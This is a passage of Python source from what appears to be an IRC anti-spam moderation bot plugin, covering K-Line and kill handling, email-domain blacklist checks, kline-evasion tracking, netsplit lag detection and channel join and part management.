elif len(h) > 3:
h = h[:3]
h = '%s/*' % '/'.join(h)
else:
h = host
self.cache[prefix] = '%s@%s' % (ident,h)
else:
if ident.startswith('~'):
ident = '*'
self.cache[prefix] = '%s@%s' % (ident,host)
else:
if ident.startswith('~'):
ident = '*'
if utils.net.isIPV4(host):
self.cache[prefix] = '%s@%s' % (ident,host)
elif utils.net.bruteIsIPV6(host):
self.cache[prefix] = '%s@%s' % (ident,host)
else:
i = self.getIrc(irc)
if self.registryValue('useWhoWas'):
self.cache[prefix] = '%s@%s' % (ident,host)
elif not prefix in i.resolving:
i.resolving[prefix] = True
t = world.SupyThread(target=self.resolve,name=format('resolve %s', prefix),args=(irc,prefix,channel,dnsbl,comment))
t.setDaemon(True)
t.start()
return '%s@%s' % (ident,host)
if prefix in self.cache:
return self.cache[prefix]
else:
if ident.startswith('~'):
ident = '*'
return '%s@%s' % (ident,host)
def do352 (self,irc,msg):
# RPL_WHOREPLY
channel = msg.args[1]
(nick, ident, host) = (msg.args[5], msg.args[2], msg.args[3])
if irc.isChannel(channel):
chan = self.getChan(irc,channel)
t = time.time()
prefix = '%s!%s@%s' % (nick,ident,host)
mask = self.prefixToMask(irc,prefix,channel)
if isCloaked(prefix,self):
t = t - self.registryValue('ignoreDuration',channel=channel) - 1
chan.nicks[nick] = [t,prefix,mask,'','']
def spam (self,irc,msg,args,channel):
"""<channel>
trusted users can ask the bot to join <channel> for a limited period of time
"""
if not channel in irc.state.channels:
t = time.time() - (self.registryValue('leaveChannelIfNoActivity',channel=channel) * 24 * 3600) + 3600
self.setRegistryValue('lastActionTaken',t,channel=channel)
irc.sendMsg(ircmsgs.join(channel))
chan = self.getChan(irc,channel)
chan.requestedBySpam = True
self.logChannel(irc,"JOIN: [%s] due to %s (trusted)" % (channel,msg.prefix))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(channel)
except KeyError:
pass
irc.replySuccess()
spam = wrap(spam,[('checkCapability','trusted'),'channel'])
def unstaffed (self,irc,msg,args):
"""
returns monitored channels without staffers
"""
channels = []
for channel in irc.state.channels:
found = False
for nick in list(irc.state.channels[channel].users):
try:
hostmask = irc.state.nickToHostmask(nick)
if ircutils.isUserHostmask(hostmask) and self.registryValue('staffCloak') in hostmask:
found = True
break
except:
continue
if not found:
channels.append(channel)
irc.reply('%s channels: %s' %(len(channels),', '.join(channels)))
unstaffed = wrap(unstaffed,['owner'])
def list (self,irc,msg,args):
"""
returns the list of monitored channels with their user counts; * marks channels where leaveChannelIfNoActivity is -1
"""
channels = []
for channel in list(irc.state.channels):
flag = ''
if self.registryValue('leaveChannelIfNoActivity',channel=channel) == -1:
flag = '*'
l = len(irc.state.channels[channel].users)
if not channel == self.registryValue('secretChannel') and not channel == self.registryValue('snoopChannel') and not channel == self.registryValue('reportChannel') and not channel == self.registryValue('logChannel'):
channels.append((l,flag,channel))
def getKey(item):
return item[0]
chs = sorted(channels,key=getKey,reverse=True)
channels = []
for c in chs:
(l,flag,channel) = c
channels.append('%s %s(%s)' % (channel,flag,l))
irc.reply('%s channels: %s' %(len(channels),', '.join(channels)))
list = wrap(list,['owner'])
def do001 (self,irc,msg):
i = self.getIrc(irc)
if not i.opered:
if len(self.registryValue('operatorNick')) and len(self.registryValue('operatorPassword')):
irc.queueMsg(ircmsgs.IrcMsg('OPER %s %s' % (self.registryValue('operatorNick'),self.registryValue('operatorPassword'))))
def do381 (self,irc,msg):
i = self.getIrc(irc)
if not i.opered:
i.opered = True
irc.queueMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
irc.queueMsg(ircmsgs.IrcMsg('MODE %s +s +Fbnfl' % irc.nick))
try:
conf.supybot.protocols.irc.throttleTime.setValue(0.0)
except:
pass
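# doMode tracks the bot's own user modes (oper and +p "god" state), re-ops via
# ChanServ when +z is set on a channel, refreshes voiced users' timestamps on
# +m channels, and counts +b/+q bans per IP range to spot ban collectors.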
def doMode (self,irc,msg):
target = msg.args[0]
if target == irc.nick:
i = self.getIrc(irc)
modes = ircutils.separateModes(msg.args[1:])
for change in modes:
(mode,value) = change
if mode == '-o':
i.opered = False
if len(self.registryValue('operatorNick')) and len(self.registryValue('operatorPassword')):
irc.queueMsg(ircmsgs.IrcMsg('OPER %s %s' % (self.registryValue('operatorNick'),self.registryValue('operatorPassword'))))
elif mode == '+p':
i.god = True
self.log.debug('%s is switching to god' % irc.nick)
self.applyDefcon(irc)
elif mode == '-p':
i.god = False
self.log.debug('%s is switching to mortal' % irc.nick)
elif target in irc.state.channels and 'm' in irc.state.channels[target].modes:
modes = ircutils.separateModes(msg.args[1:])
for change in modes:
(mode,value) = change
if mode == '+v':
chan = self.getChan(irc,target)
if value in chan.nicks:
a = chan.nicks[value]
if len(a) == 5:
chan.nicks[value] = [time.time(),a[1],a[2],a[3],a[4]]
else:
chan.nicks[value] = [time.time(),a[1],a[2],'','']
elif target in irc.state.channels:
modes = ircutils.separateModes(msg.args[1:])
for change in modes:
(mode,value) = change
if mode == '+z':
if not irc.nick in list(irc.state.channels[target].ops):
irc.queueMsg(ircmsgs.IrcMsg('PRIVMSG ChanServ :OP %s' % target))
if target == self.registryValue('mainChannel'):
self.opStaffers(irc)
elif mode == '+b' or mode == '+q':
if ircutils.isUserHostmask(value):
mask = self.prefixToMask(irc,value)
ip = mask.split('@')[1]
permit = self.registryValue('banPermit')
if permit > -1:
ipranges = self._ip_ranges(ip)
announced = False
for range in ipranges:
range = range
q = self.getIrcQueueFor(irc,'ban-check',range,self.registryValue('banLife'))
q.enqueue(target)
if len(q) > permit:
chs = []
for m in q:
chs.append(m)
q.reset()
if not announced:
announced = True
self.logChannel(irc,"INFO: *@%s is collecting bans (%s/%ss) %s" % (range, permit, self.registryValue('banLife'), ','.join(chs)))
permit = permit + 1
def opStaffers (self,irc):
ops = []
if self.registryValue('mainChannel') in irc.state.channels and irc.nick in list(irc.state.channels[self.registryValue('mainChannel')].ops):
for nick in list(irc.state.channels[self.registryValue('mainChannel')].users):
if not nick in list(irc.state.channels[self.registryValue('mainChannel')].ops):
try:
mask = irc.state.nickToHostmask(nick)
if mask and self.registryValue('staffCloak') in mask:
ops.append(nick)
except:
continue
if len(ops):
for i in range(0, len(ops), 4):
irc.sendMsg(ircmsgs.ops(self.registryValue('mainChannel'),ops[i:i+4],irc.prefix))
def getIrc (self,irc):
if not irc.network in self._ircs:
self._ircs[irc.network] = Ircd(irc)
self._ircs[irc.network].restore(self.getDb(irc.network))
if len(self.registryValue('operatorNick')) and len(self.registryValue('operatorPassword')):
irc.queueMsg(ircmsgs.IrcMsg('OPER %s %s' % (self.registryValue('operatorNick'),self.registryValue('operatorPassword'))))
return self._ircs[irc.network]
def doAccount (self,irc,msg):
i = self.getIrc(irc)
if ircutils.isUserHostmask(msg.prefix):
nick = ircutils.nickFromHostmask(msg.prefix)
acc = msg.args[0]
if acc == '*':
acc = None
else:
aa = acc.lower()
for u in i.klinednicks:
if aa == u:
self.logChannel(irc,"SERVICE: %s (%s) lethal account (account-notify)" % (msg.prefix,acc))
src = msg.nick
i.klinednicks.enqueue(aa)
if not src in i.tokline:
i.toklineresults[src] = {}
i.toklineresults[src]['kind'] = 'evade'
i.tokline[src] = src
def f ():
irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
schedule.addEvent(f,time.time()+random.randint(0,7))
#irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
break
for channel in irc.state.channels:
if irc.isChannel(channel):
chan = self.getChan(irc,channel)
if nick in chan.nicks:
a = chan.nicks[msg.nick]
if len(a) == 5:
chan.nicks[msg.nick] = [a[0],a[1],a[2],a[3],acc]
else:
chan.nicks[msg.nick] = [a[0],a[1],a[2],'',acc]
def getChan (self,irc,channel):
i = self.getIrc(irc)
if not channel in i.channels and irc.isChannel(channel):
i.channels[channel] = Chan(channel)
if not self.starting:
irc.queueMsg(ircmsgs.who(channel))
return i.channels[channel]
def kill (self,irc,nick,reason=None):
i = self.getIrc(irc)
if i.defcon:
i.defcon = time.time()
if not self.registryValue('enable'):
self.logChannel(irc,"INFO: disabled, can't kill %s" % nick)
return
if not i.opered:
self.logChannel(irc,"INFO: not opered, can't kill %s" % nick)
return
if not reason:
reason = self.registryValue('killMessage')
irc.sendMsg(ircmsgs.IrcMsg('KILL %s :%s' % (nick,reason)))
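# do338 handles the numeric carrying a user's actual host/IP (received here in
# reply to the WHOWAS sent by kline() below): it rebuilds the real mask for a
# pending kline and then issues the K-Line or OperServ AKILL.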
def do338 (self,irc,msg):
i = self.getIrc(irc)
if msg.args[0] == irc.nick and msg.args[1] in i.whowas:
pending = i.whowas[msg.args[1]]
del i.whowas[msg.args[1]]
(nick,ident,host) = ircutils.splitHostmask(pending[0])
# [prefix,mask,duration,reason,klineMessage]
ident = pending[1].split('@')[0]
h = msg.args[2]
if h == '255.255.255.255':
h = host
mask = self.prefixToMask(irc,'%s!%s@%s' % (nick,ident,h))
if not self.registryValue('enable'):
self.logChannel(irc,"INFO: disabled, can't kline %s (%s)" % (mask,pending[3]))
if pending[1] in i.klines:
del i.klines[pending[1]]
return
if not i.opered:
self.logChannel(irc,"INFO: not opered, can't kline %s (%s)" % (mask,pending[3]))
if pending[1] in i.klines:
del i.klines[pending[1]]
return
self.log.info('KLINE %s|%s' % (mask,pending[3]))
if self.registryValue('useOperServ'):
irc.sendMsg(ircmsgs.IrcMsg('PRIVMSG OperServ :AKILL ADD %s !T %s %s | %s' % (mask,pending[2],pending[4],pending[3])))
else:
irc.sendMsg(ircmsgs.IrcMsg('KLINE %s %s :%s|%s' % (pending[2],mask,pending[4],pending[3])))
nickLowered = nick.lower()
for channel in irc.state.channels:
chan = self.getChan(irc,channel)
if len(chan.klines):
index = 0
for k in chan.klines:
if k.startswith(nickLowered):
(at, m) = chan.klines.queue[index]
chan.klines.queue[index] = (at,'%s %s' % (nickLowered,mask))
self.log.info('kline %s replaced at %s: %s / %s' % (m,index,nickLowered,mask))
break
index = index + 1
if pending[1] in i.klines:
del i.klines[pending[1]]
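# kline places a K-Line (or OperServ AKILL) for a mask. For cloaked prefixes
# with useWhoWas enabled, the ban is deferred: the prefix is queued in i.whowas
# and a WHOWAS is sent so do338 can recover the real host first.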
def kline (self,irc,prefix,mask,duration,reason,klineMessage=None):
i = self.getIrc(irc)
if mask in i.klines:
return
if duration < 0:
self.log.info('Ignored kline %s due to no duration', mask)
return
if not klineMessage:
klineMessage = self.registryValue('klineMessage')
if '"' in klineMessage:
klineMessage = self.registryValue('klineMessage')
canKline = True
i.klines[mask] = mask
if "bc.googleusercontent.com" in prefix:
reason = reason + ' !dnsbl Unknown spambot or drone'
if ircutils.isUserHostmask(prefix):
canKline = not self.registryValue('useWhoWas')
if i.defcon or 'gateway/' in prefix:
canKline = True
elif '/' in prefix:
canKline = False
else:
self.log.info('INVALID PREFIX %s : %s : %s' % (prefix,mask,reason))
self.log.info('CANKLINE %s %s %s' % (prefix,mask,canKline))
if canKline:
if not self.registryValue('enable'):
self.logChannel(irc,"INFO: disabled, can't kline %s (%s)" % (mask,reason))
else:
self.log.info('KLINE %s|%s' % (mask,reason))
if self.registryValue('useOperServ'):
irc.sendMsg(ircmsgs.IrcMsg('PRIVMSG OperServ :AKILL ADD %s !T %s %s | %s' % (mask,duration,klineMessage,reason)))
else:
irc.sendMsg(ircmsgs.IrcMsg('KLINE %s %s :%s|%s' % (duration,mask,klineMessage,reason)))
if i.defcon:
i.defcon = time.time()
elif ircutils.isUserHostmask(prefix):
(nick,ident,host) = ircutils.splitHostmask(prefix)
self.log.info('whowas for %s | %s | %s' % (prefix,mask,reason))
if not nick in i.whowas:
i.whowas[nick] = [prefix,mask,duration,reason,klineMessage]
irc.sendMsg(ircmsgs.IrcMsg('WHOWAS %s' % nick))
def forgetKline ():
i = self.getIrc(irc)
if mask in i.klines:
del i.klines[mask]
schedule.addEvent(forgetKline,time.time()+7)
def ban (self,irc,nick,prefix,mask,duration,reason,message,log,killReason=None):
self.kill(irc,nick,killReason)
self.kline(irc,prefix,mask,duration,reason,message)
self.logChannel(irc,log)
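# getIrcQueueFor returns (creating it if needed) the TimeoutQueue of the given
# kind for a key (host, channel, ...), keeping its timeout in sync with the
# requested life; rmIrcQueueFor drops every queue attached to a key.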
def getIrcQueueFor (self,irc,key,kind,life):
i = self.getIrc(irc)
if not key in i.queues:
i.queues[key] = {}
if not kind in i.queues[key]:
i.queues[key][kind] = utils.structures.TimeoutQueue(life)
elif i.queues[key][kind].timeout != life:
i.queues[key][kind].setTimeout(life)
return i.queues[key][kind]
def rmIrcQueueFor (self,irc,key):
i = self.getIrc(irc)
if key in i.queues:
for k in i.queues[key]:
if type(i.queues[key][k]) == utils.structures.TimeoutQueue:
i.queues[key][k].reset()
i.queues[key][k].queue = None
i.queues[key].clear()
del i.queues[key]
def do015 (self,irc,msg):
try:
(targets,text) = msg.args
i = self.getIrc(irc)
reg = r".*-\s+([a-z]+\.freenode\.net)\[.*Users:\s+(\d{2,6})\s+"
result = re.match(reg,text)
# here we store server name and users count, and we will ping the server with the most users
if result:
i.servers[result.group(1)] = int(result.group(2))
except:
pass
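# do015 parses MAP output to record per-server user counts; do017 (end of the
# listing) then sends a TIME query to the most populated server. If no reply
# arrives within lagPermit seconds, bye() below switches the bot into netsplit
# mode; do391 (the TIME reply) does the same when the measured delay is too high.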
def do017 (self,irc,msg):
found = None
users = None
i = self.getIrc(irc)
for server in i.servers:
if not users or users < i.servers[server]:
found = server
users = i.servers[server]
server = None
if found:
i.servers = {}
server = '%s' % found
i.servers[server] = time.time()
def bye():
i = self.getIrc(irc)
if server in i.servers:
del i.servers[server]
if not i.netsplit:
self.logChannel(irc,'INFO: netsplit activated for %ss due to %s/%ss of lags with %s : some abuses are ignored' % (self.registryValue('netsplitDuration'),self.registryValue('lagPermit'),self.registryValue('lagPermit'),server))
i.netsplit = time.time() + self.registryValue('netsplitDuration')
schedule.addEvent(bye,time.time()+self.registryValue('lagPermit'))
irc.queueMsg(ircmsgs.IrcMsg('TIME %s' % server))
def resync (self,irc,msg,args):
"""in case of plugin being reloaded
call this to recompute user to ignore (ignoreDuration)"""
for channel in irc.state.channels:
irc.queueMsg(ircmsgs.who(channel))
irc.replySuccess()
resync = wrap(resync,['owner'])
def lethalaccount (self,irc,msg,args,text):
"""<accountname> monitor account and kline it on sight
during 24h, via extended-join, account-notify, account's name change"""
i = self.getIrc(irc)
account = text.lower().strip()
i.klinednicks.enqueue(account)
self.logChannel(irc,'SERVICE: %s lethaled for 24h by %s' % (account, msg.nick))
for channel in irc.state.channels:
if irc.isChannel(channel):
c = self.getChan(irc,channel)
for u in list(irc.state.channels[channel].users):
if u in c.nicks:
if len(c.nicks[u]) > 4:
if c.nicks[u][4] and c.nicks[u][4].lower() == account:
self.ban(irc,u,c.nicks[u][1],c.nicks[u][2],self.registryValue('klineDuration'),'Lethaled account %s' % account,self.registryValue('klineMessage'),'BAD: %s (lethaled account %s)' % (account,c.nicks[u][1]),self.registryValue('killMessage'))
irc.replySuccess()
lethalaccount = wrap(lethalaccount,['owner','text'])
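# cleanup periodically parts channels that have been inactive longer than
# leaveChannelIfNoActivity days, prunes empty TimeoutQueues and buffers, and
# forgets nicks that are no longer present in their channels.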
def cleanup (self,irc):
i = self.getIrc(irc)
partReason = 'Leaving the channel. /invite %s %s again if needed'
for channel in irc.state.channels:
if irc.isChannel(channel) and not channel in self.registryValue('mainChannel') and not channel == self.registryValue('snoopChannel') and not channel == self.registryValue('logChannel') and not channel == self.registryValue('reportChannel') and not channel == self.registryValue('secretChannel'):
if self.registryValue('lastActionTaken',channel=channel) > 1.0 and self.registryValue('leaveChannelIfNoActivity',channel=channel) > -1 and not i.defcon:
if time.time() - self.registryValue('lastActionTaken',channel=channel) > (self.registryValue('leaveChannelIfNoActivity',channel=channel) * 24 * 3600):
irc.queueMsg(ircmsgs.part(channel, partReason % (irc.nick,channel)))
chan = self.getChan(irc,channel)
if chan.requestedBySpam:
self.setRegistryValue('lastActionTaken',self.registryValue('lastActionTaken'),channel=channel)
else:
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
self.logChannel(irc,'PART: [%s] due to inactivity for %s days' % (channel,self.registryValue('leaveChannelIfNoActivity',channel=channel)))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().remove(channel)
except KeyError:
pass
kinds = []
for kind in i.queues:
count = 0
ks = []
try:
for k in i.queues[kind]:
if isinstance(i.queues[kind][k],utils.structures.TimeoutQueue):
if not len(i.queues[kind][k]):
ks.append(k)
else:
count += 1
else:
count += 1
except:
self.log.error('Exception with %s' % kind)
if len(ks):
for k in ks:
del i.queues[kind][k]
if count == 0:
kinds.append(kind)
for kind in kinds:
del i.queues[kind]
chs = []
for channel in i.channels:
chan = i.channels[channel]
ns = []
for n in chan.nicks:
if channel in irc.state.channels:
if not n in irc.state.channels[channel].users:
ns.append(n)
else:
ns.append(n)
for n in ns:
del chan.nicks[n]
bs = []
for b in chan.buffers:
qs = []
count = 0
for q in chan.buffers[b]:
if isinstance(chan.buffers[b][q],utils.structures.TimeoutQueue):
if not len(chan.buffers[b][q]):
qs.append(q)
else:
count += 1
else:
count +=1
for q in qs:
del chan.buffers[b][q]
if count == 0:
bs.append(b)
for b in bs:
del chan.buffers[b]
logs = []
if chan.logs:
for log in chan.logs:
if not len(chan.logs[log]):
logs.append(log)
for log in logs:
del chan.logs[log]
if len(ns) or len(bs) or len(logs):
chs.append('[%s : %s nicks, %s buffers, %s logs]' % (channel,len(ns),len(bs),len(logs)))
def do391 (self,irc,msg):
i = self.getIrc(irc)
if msg.prefix in i.servers:
delay = time.time()-i.servers[msg.prefix]
del i.servers[msg.prefix]
if delay > self.registryValue('lagPermit'):
if not i.netsplit:
self.logChannel(irc,'INFO: netsplit activated for %ss due to %s/%ss of lags with %s : some abuses are ignored' % (self.registryValue('netsplitDuration'),delay,self.registryValue('lagPermit'),msg.prefix))
i.netsplit = time.time() + self.registryValue('netsplitDuration')
def do219 (self,irc,msg):
i = self.getIrc(irc)
r = []
for k in i.stats:
if i.stats[k] > self.registryValue('ghostPermit'):
r.append(k.replace('[unknown@','').replace(']',''))
for ip in r:
irc.sendMsg(ircmsgs.IrcMsg('DLINE %s %s on * :%s' % (1440,ip,self.registryValue('msgTooManyGhost'))))
i.stats = {}
if len(r):
self.logChannel(irc,'DOS: %s ip(s) %s' % (len(r),', '.join(r)))
if len(i.dlines):
for l in i.dlines:
found = False
for ip in i.ilines:
if l in ip:
found = True
break
if not found:
self.log.info('DLINE %s|%s' % (l,self.registryValue('saslDuration')))
irc.sendMsg(ircmsgs.IrcMsg('DLINE %s %s on * :%s' % (self.registryValue('saslDuration'),l,self.registryValue('saslMessage'))))
i.dlines = []
i.ilines = {}
def do311 (self,irc,msg):
i = self.getIrc(irc)
nick = msg.args[1]
if nick in i.mx:
ident = msg.args[2]
hostmask = '%s!%s@%s' % (nick,ident,msg.args[3])
email = i.mx[nick][0]
badmail = i.mx[nick][1]
mx = i.mx[nick][2]
freeze = i.mx[nick][3]
del i.mx[nick]
mask = self.prefixToMask(irc,hostmask)
self.logChannel(irc,'SERVICE: %s registered %s with *@%s is in mxbl (%s)' % (hostmask,nick,email,mx))
if badmail and len(email) and len(nick):
if not freeze:
irc.queueMsg(ircmsgs.notice(nick,'Your account has been dropped, please register it again with a valid email address (no disposable temporary email)'))
elif nick in i.tokline:
if not nick in i.toklineresults:
i.toklineresults[nick] = {}
ident = msg.args[2]
hostmask = '%s!%s@%s' % (nick,ident,msg.args[3])
mask = self.prefixToMask(irc,hostmask)
gecos = msg.args[5]
i.toklineresults[nick]['hostmask'] = hostmask
i.toklineresults[nick]['mask'] = mask
i.toklineresults[nick]['gecos'] = gecos
def do317 (self,irc,msg):
i = self.getIrc(irc)
nick = msg.args[1]
if nick in i.tokline:
if not nick in i.toklineresults:
i.toklineresults[nick] = {}
i.toklineresults[nick]['signon'] = float(msg.args[3])
def do330 (self,irc,msg):
i = self.getIrc(irc)
nick = msg.args[1]
if nick in i.tokline:
if not nick in i.toklineresults:
i.toklineresults[nick] = {}
i.toklineresults[nick]['account'] = True
def do318 (self,irc,msg):
i = self.getIrc(irc)
nick = msg.args[1]
if nick in i.toklineresults:
if i.toklineresults[nick]['kind'] == 'evade':
uid = random.randint(0,1000000)
irc.sendMsg(ircmsgs.IrcMsg('KLINE %s %s :%s|%s' % (self.registryValue('klineDuration'),i.toklineresults[nick]['mask'],self.registryValue('klineMessage'),'%s - kline evasion' % (uid))))
self.logChannel(irc,'BAD: [%s] %s (kline evasion)' % (i.toklineresults[nick]['hostmask'],uid))
del i.tokline[nick]
del i.toklineresults[nick]
def doInvite(self, irc, msg):
channel = msg.args[1]
i = self.getIrc(irc)
self.log.info('%s inviting %s in %s (%s | %s | %s)' % (msg.prefix,irc.nick,channel,self.registryValue('leaveChannelIfNoActivity',channel=channel),self.registryValue('lastActionTaken',channel=channel),self.registryValue('minimumUsersInChannel')))
if channel and not channel in irc.state.channels and not ircdb.checkIgnored(msg.prefix):
if self.registryValue('leaveChannelIfNoActivity',channel=channel) == -1:
irc.queueMsg(ircmsgs.join(channel))
self.logChannel(irc,"JOIN: [%s] due to %s's invite" % (channel,msg.prefix))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(channel)
except KeyError:
pass
elif self.registryValue('lastActionTaken',channel=channel) > 0.0:
if self.registryValue('minimumUsersInChannel') > -1:
i.invites[channel] = msg.prefix
irc.queueMsg(ircmsgs.IrcMsg('LIST %s' % channel))
else:
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
irc.queueMsg(ircmsgs.join(channel))
self.logChannel(irc,"JOIN: [%s] due to %s's invite" % (channel,msg.prefix))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(channel)
except KeyError:
pass
irc.queueMsg(ircmsgs.privmsg(channel,'** Warning: if there is any bot in %s which should be exempted from %s, contact staffers before it gets caught **' % (channel,irc.nick)))
else:
self.logChannel(irc,'INVITE: [%s] %s is asking for %s' % (channel,msg.prefix,irc.nick))
irc.queueMsg(ircmsgs.privmsg(msg.nick,'The invitation to %s will be reviewed by staff' % channel))
def do322 (self,irc,msg):
i = self.getIrc(irc)
if msg.args[1] in i.invites:
if int(msg.args[2]) >= self.registryValue('minimumUsersInChannel'):
self.setRegistryValue('lastActionTaken',time.time(),channel=msg.args[1])
irc.queueMsg(ircmsgs.join(msg.args[1]))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(msg.args[1])
except KeyError:
pass
self.logChannel(irc,"JOIN: [%s] due to %s's invite (%s users)" % (msg.args[1],i.invites[msg.args[1]],msg.args[2]))
irc.queueMsg(ircmsgs.privmsg(msg.args[1],'** Warning: if there is any bot in %s which should be exempted from %s, contact staffers before it gets caught **' % (msg.args[1],irc.nick)))
else:
self.logChannel(irc,"INVITE: [%s] by %s denied (%s users)" % (msg.args[1],i.invites[msg.args[1]],msg.args[2]))
(nick,ident,host) = ircutils.splitHostmask(i.invites[msg.args[1]])
irc.queueMsg(ircmsgs.privmsg(nick,'Invitation denied, there are only %s users in %s (%s minimum for %s): contact staffers if needed.' % (msg.args[2],msg.args[1],self.registryValue('minimumUsersInChannel'),irc.nick)))
del i.invites[msg.args[1]]
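# resolveSnoopy checks a registration email domain against the mxbl list: the
# domain itself, then its MX / A / AAAA records, are compared to the blacklist;
# on a hit the domain is BADMAILed and the account FDROPped (or frozen), and
# the result is kept in i.mx until the WHOIS reply is processed in do311.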
def resolveSnoopy (self,irc,account,email,badmail,freeze):
resolver = dns.resolver.Resolver()
resolver.timeout = 10
resolver.lifetime = 10
found = None
mxbl = set(self.registryValue('mxbl'))
i = self.getIrc(irc)
if email.lower() in mxbl:
found = email
else:
to_resolve = [(email,'MX'), (email,'A'), (email,'AAAA')]
while to_resolve:
domain, type = to_resolve.pop(0)
try:
res = resolver.query(domain, type)
except:
pass
else:
for record in res:
record = record.to_text()
if type == 'MX':
record = record.split(" ", 1)[1].lower()
# MX records (and their A records) are what we match on most,
# so doing .insert(0, ...) means they're checked first
to_resolve.insert(0, (record, 'A'))
to_resolve.insert(0, (record, 'AAAA'))
if record in mxbl:
found = record
break
if found is not None:
break
if found is not None:
i.mx[account] = [email,badmail,found,freeze]
if badmail and len(email):
irc.queueMsg(ircmsgs.IrcMsg('PRIVMSG NickServ :BADMAIL ADD *@%s %s' % (email,found)))
if not freeze:
irc.queueMsg(ircmsgs.IrcMsg('PRIVMSG NickServ :FDROP %s' % account))
else:
irc.queueMsg(ircmsgs.IrcMsg('PRIVMSG NickServ :FREEZE %s ON changed email to (%s which is in mxbl %s)' % (account,email,found)))
irc.queueMsg(ircmsgs.IrcMsg('WHOIS %s' % account))
else:
i.cleandomains[email] = True
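# handleSnoopMessage watches services snoop notices: NickServ REGISTER events
# trigger an mxbl check of the email domain (resolveSnoopy above), and
# GROUP / SET:ACCOUNTNAME / UNGROUP sequences are tracked to catch people
# renaming accounts to evade a lethal (klined) account.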
def handleSnoopMessage (self,irc,msg):
(targets, text) = msg.args
text = text.replace('\x02','')
if msg.nick == 'NickServ' and 'REGISTER:' in text:
email = text.split('@')[1]
account = text.split(' ')[0]
i = self.getIrc(irc)
if not email in i.cleandomains:
t = world.SupyThread(target=self.resolveSnoopy,name=format('Snoopy %s', email),args=(irc,account,email,True,False))
t.setDaemon(True)
t.start()
account = account.lower().strip()
q = self.getIrcQueueFor(irc,account,'nsregister',600)
q.enqueue(email)
if msg.nick == 'NickServ':
src = text.split(' ')[0].lower().strip()
target = ''
registering = True
grouping = False
if ' GROUP:' in text:
grouping = True
target = text.split('(')[1].split(')')[0]
elif 'SET:ACCOUNTNAME:' in text:
grouping = True
t = text.split('(')
if len(t) > 1:
target = text.split('(')[1].split(')')[0]
else:
return
elif 'UNGROUP: ' in text:
grouping = True
target = text.split('UNGROUP: ')[1]
if len(target) and grouping:
q = self.getIrcQueueFor(irc,src,'nsAccountGroup',120)
q.enqueue(text)
if len(q) == 3:
index = 0
a = b = c = False
oldAccount = None
for m in q:
if ' GROUP:' in m and index == 0:
a = True
elif ' SET:ACCOUNTNAME:' in m and index == 1:
                            oldAccount = m.split(' ')[1].replace('(','').replace(')','')
b = True
elif ' UNGROUP:' in m and index == 2:
c = True
index = index + 1
q.reset()
if a and b and c:
                        self.logChannel(irc,"SERVICE: %s suspicious evasion/abuse via GROUP/ACCOUNTNAME/UNGROUP (was %s)" % (src,oldAccount))
i = self.getIrc(irc)
oldAccount = oldAccount.lower().strip()
for u in i.klinednicks:
if u == oldAccount:
self.logChannel(irc,"SERVICE: %s lethaled (%s), enforcing" % (src,oldAccount))
i.klinednicks.enqueue(src)
if not src in i.tokline:
i.toklineresults[src] = {}
i.toklineresults[src]['kind'] = 'evade'
i.tokline[src] = src
def f ():
irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
schedule.addEvent(f,time.time()+random.randint(0,7))
break
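# 211 (STATS L reply): counts entries reported as [unknown@...] to spot servers accumulating unknown connections.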
def do211 (self,irc,msg):
i = self.getIrc(irc)
if msg.args[1].startswith('[unknown@'):
if msg.args[1] in i.stats:
i.stats[msg.args[1]] = i.stats[msg.args[1]] + 1
else:
i.stats[msg.args[1]] = 0
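# 728 (quiet list entry): once defcon is over, drop the emergency $~a quiet the bot set on defconMode channels.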
def do728 (self,irc,msg):
i = self.getIrc(irc)
channel = msg.args[1]
value = msg.args[3]
op = msg.args[4]
if self.registryValue('defconMode',channel=channel) and not i.defcon:
if value == '$~a' and op == irc.prefix:
if channel == self.registryValue('mainChannel'):
irc.sendMsg(ircmsgs.IrcMsg('MODE %s -qz $~a' % channel))
else:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s -qzo $~a %s' % (channel,irc.nick)))
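# Core message analysis: runs every channel heuristic (patterns, repeat, hilight, flood, ctcp, caps, notices, ...)
# against the sender and decides whether to ignore, warn or k-line, depending on channel state and defcon.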
def handleMsg (self,irc,msg,isNotice):
if not ircutils.isUserHostmask(msg.prefix):
return
if msg.prefix == irc.prefix:
return
(targets, t) = msg.args
if ircmsgs.isAction(msg):
text = ircmsgs.unAction(msg)
else:
text = t
try:
raw = ircutils.stripFormatting(text)
except:
raw = text
text = raw.lower()
mask = self.prefixToMask(irc,msg.prefix)
i = self.getIrc(irc)
if not i.ping or time.time() - i.ping > self.registryValue('lagInterval'):
i.ping = time.time()
self.cleanup(irc)
if self.registryValue('lagPermit') > -1:
i.stats = {}
if self.registryValue('ghostPermit') > -1:
irc.queueMsg(ircmsgs.IrcMsg('STATS L'))
irc.queueMsg(ircmsgs.IrcMsg('MAP'))
if i.defcon:
if time.time() > i.defcon + self.registryValue('defcon'):
i.lastDefcon = time.time()
i.defcon = False
self.logChannel(irc,"INFO: triggers restored to normal behaviour")
for channel in irc.state.channels:
if irc.isChannel(channel) and self.registryValue('defconMode',channel=channel):
if 'z' in irc.state.channels[channel].modes and irc.nick in list(irc.state.channels[channel].ops) and not 'm' in irc.state.channels[channel].modes:
irc.queueMsg(ircmsgs.IrcMsg('MODE %s q' % channel))
if i.netsplit:
if time.time() > i.netsplit:
i.netsplit = False
self.logChannel(irc,"INFO: netsplit mode deactivated")
if mask in i.klines:
self.log.debug('Ignoring %s (%s) - kline in progress', msg.prefix,mask)
return
isBanned = False
for channel in targets.split(','):
if channel.startswith('@'):
channel = channel.replace('@','',1)
if channel.startswith('+'):
channel = channel.replace('+','',1)
if irc.isChannel(channel) and channel in irc.state.channels:
if self.registryValue('reportChannel') == channel:
self.handleReportMessage(irc,msg)
if self.registryValue('snoopChannel') == channel:
self.handleSnoopMessage(irc,msg)
if self.registryValue('secretChannel') == channel:
self.handleSecretMessage(irc,msg)
if self.registryValue('ignoreChannel',channel):
continue
